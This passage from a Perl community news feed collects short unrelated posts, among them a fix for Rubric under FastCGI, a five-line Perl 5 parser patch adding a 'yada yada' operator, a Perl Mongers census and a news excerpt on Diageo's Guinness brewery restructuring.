would have its QUERY_STRING parsed and nothing else would ever get looked at.
I fixed that by shoving an initialize_globals call in Rubric's run method.
Things seemed alright until I tried to log in to post. No matter what, HTTP
POST requests were coming through with no content. I stared at it until I gave
up, and then I couldn't post anything new because I couldn't log in.
That was that, until tonight. I checked on my Hiveminder todo list and saw 78 things to do. (Good grief!) The second one is a reminder to get new App::Cmd stuff done by a week ago, and I thought, "Gosh. I should get that done, and then post an explanation of why the changes are so good."
Then I thought, "I can't post anything new, my Rubric won't let me log in!"
Then I thought, "I need to fix Rubric under FastCGI before I start on any of the other 78 things in my todo list." I guess this is a story about being lazy and busy, too.
I resorted to looking through the source of Rubric, CGI::Application, FCGI, FCGI::Engine, and other things. I finally noticed that FCGI::Engine passed a CGI::Simple query into the code it called -- a fact that was not documented. Once I added the dozen-or-so characters needed to tell Rubric to use that query instead of a newly-built one, everything just worked. Awesome! Once again, it goes to show that reading the source is always a good strategy.
I've filed a ticket suggesting that the docs should mention the parameter.
Now I need to get to work posting old news!
Here's an idea that occurs to me frequently when making slides for conference tutorials. Sometimes I make a slide and I know that it might be too advanced, but it's a crap shoot. If the vast majority of the audience understands the slide, I can save several slides by not explaining it. If enough people look confused, I want to display those slides. I don't mind making the slides up front, but I'd like to be able to only show them if I think it's needed.
I wonder if there's some way to make good Keynote triggers that would let me
say something like: "if you want to explain why 1 + 1 = 1, press F1;
otherwise, press Next."
Choose your own slideshow.
I also wonder whether the Visor program that I saw ages ago is triggerable during a slide show. It looks good, and it would be convenient to keep a giant-font terminal ready to slide down to demonstrate answers to hard questions.
Read more of this story at use Perl.
As promised a couple of weeks ago, I've sent a census email to all registered leaders of Perl Mongers groups. If you are the leader of a group and you haven't received the mail, then please contact me at census[at]pm.org.
Results should follow in a few weeks (dependent on how soon the group leaders respond).
Read more of this story at use Perl.
Phew! The rumours were untrue. Diageo will not be closing down the Guinness brewery in Dublin 8, and will continue brewing the black stuff in Dublin 8, thankfully:
Diageo is to close its breweries at Kilkenny and Dundalk, significantly reduce its brewing capacity at St James’s Gate and build a new brewery on the outskirts of Dublin under a plan announced today.
The company said it would invest EUR 650 million (£520 million) between 2009 and 2013 in the restructuring.
The renovation of the St James’s Gate brewing operations is expected to cost around EUR 70 million and will see the volume of Guinness brewed there fall from around one billion pints a year, to just over 500 million.
This plant will serve the Irish and British markets and will be based on the Thomas St side of the site. The company said this would ensure that every pint of Guinness sold in Ireland would be brewed here. Approximately half of the 55 acre site will then be sold once the five-year project is complete.
Around 65 staff will remain in brewing operations at St James’s Gate with about 100 others due to transfer to the new Dublin plant. Although the company has yet to announce the exact location of its new brewery, the company says it will have a capacity of around nine million hectolitres, or around three times that of the refurbished St James’s Gate site. This new brewery will produce Guinness for export and ales and lagers for the Irish market.
Diageo said when the two Dublin breweries are fully operational in five years time it will transfer brewing out of the Kilkenny and Dundalk breweries and close these plants. This move will result in ‘a net reduction in staff of around 250′, the company said.
The company employs 800 people in its brewing operation and a total of 2,500 in the Republic and Northern Ireland.
Diageo said these two plants “do not have the scale necessary for sustained success in increasingly competitive market conditions”.
The company said it would offer those employees relocation opportunities where possible. Those for whom relocation is not possible will be offered “a severance package alongside career counselling”.
Operations at its Waterford brewery will be “streamlined” as part of the re-organisation leading to “some reduction in output”. the current workforce of 27 in Waterford would be reduced to ‘around 18′ but Diageo was unable to confirm the extent of the output reduction.
The company says the St James’s Gate site it proposes to sell and the Kilkenny and Dundalk sites have an estimated value of EUR 510 million.
The Guinness Storehouse, which receives around 900,000 visitors a year, will continue to be based at St. James’s Gate.
The company estimates it will incur one-off costs of EUR 152 million during the restructuring and says this would be treated as an exceptional cost in the fiscal year ending in June 2008.
Paul Walsh, chief executive of Diageo said: ‘Over the last twelve months we have conducted a rigorous review of our brewing operations in Ireland. It examined many options and I believe it has identified the right formula for the long-term success of our business in Ireland and for the continued global success of the Guinness brand.’
“Our ambition is to combine the most modern brewing standards with almost 300 years of brewing tradition, craft and heritage.”
Guinness has been brewed at St James’s Gate for almost 250 years. Guinness extract produced at the Dublin site is exported to more than 45 countries.
Graham (who runs search.cpan.org) let us know that two of the machines appeared to be running very slowly, and he thought it might be NFS related, as everything else looked fine.
Here's what we found looking at where requests to our NFS server were coming from...
oops.
Turns out Apache::Reload had been accidentally turned on on one of the production servers for geourl and *every* page hit was causing a stat of a few hundred .pm files. Turned it off, and NFS load dropped by 80%, and everything went back to normal.
Tune in next week for "Don't use NFS in production".
(And yes, this entire post exists to show off the pretty Google Chart.)
Perl 6 has three code placeholder operators, known affectionately as the "yada, yada, yada" operator (see List Prefix Precedence in Synopsis 3). It's a matter of (very sarcastic) public record how much I love writing, maintaining, and patching parsers, so I've just sent a very preliminary five-line patch to p5p to add support for ... to Perl 5.
--- perly.y~ 2008-05-09 17:47:35.000000000 -0700
+++ perly.y 2008-05-09 17:47:41.000000000 -0700
@@ -1227,6 +1227,11 @@
}
| WORD
| listop
+ | DOTDOT
+ {
+ $$ = newUNOP(OP_DIE, 0,
+ newSVOP(OP_CONST, 0, newSVpvs("Unimplemented")))
+ }
;
/* "my" declarations, with optional attributes */
Apply this to recentish bleadperl sources, run perl regen_perly.pl, rebuild, and now you can run programs such as:
sub foo { ... }
foo();
And get an "Unimplemented at file line line." error message.
(Now everyone who complains that I don't code enough to match my talk, please punch yourself in the face.)
Read more of this story at use Perl.
For almost a year I have not dealt with my Open Source Test Automation research I started with this article: Quality Assurance and Automated Testing in Open Source Software
Today I have decided I'll try to give another push to this project. At this point what mostly interests me is how projects written in PHP, Python and Ruby are testing themself. Actually I should also look at projects written in Perl but I know at least those living on CPAN. Maybe I should look at other projects that are not on CPAN.
The questions I am asking myself are as follows:
Read more of this story at use Perl.
|
When you need perl, think perl.org
|
|